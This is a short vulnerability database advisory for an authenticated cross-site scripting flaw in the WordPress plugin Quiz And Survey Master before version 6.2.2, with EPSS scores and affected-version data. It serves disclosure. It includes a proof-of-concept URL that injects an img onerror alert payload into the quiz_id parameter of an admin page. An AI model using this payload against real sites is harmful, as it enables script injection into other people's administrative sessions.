Lucene search

K
wpvulndbRyan DewhurstWPVDB-ID:28C4EF2E-ABD2-4EE2-9729-8F0CD1AAECBB
HistoryFeb 05, 2019 - 12:00 a.m.

Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)

2019-02-0500:00:00
Ryan Dewhurst
wpscan.com
4

0.002 Low

EPSS

Percentile

58.7%

The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

PoC

http://example.com/wp-admin/admin.php?page=mlw_quiz_results&amp;quiz;_id='"><img+src%3Dx+onerror%3Dalert(1)>

CPENameOperatorVersion
quiz-master-nextlt6.2.2

0.002 Low

EPSS

Percentile

58.7%

Related for WPVDB-ID:28C4EF2E-ABD2-4EE2-9729-8F0CD1AAECBB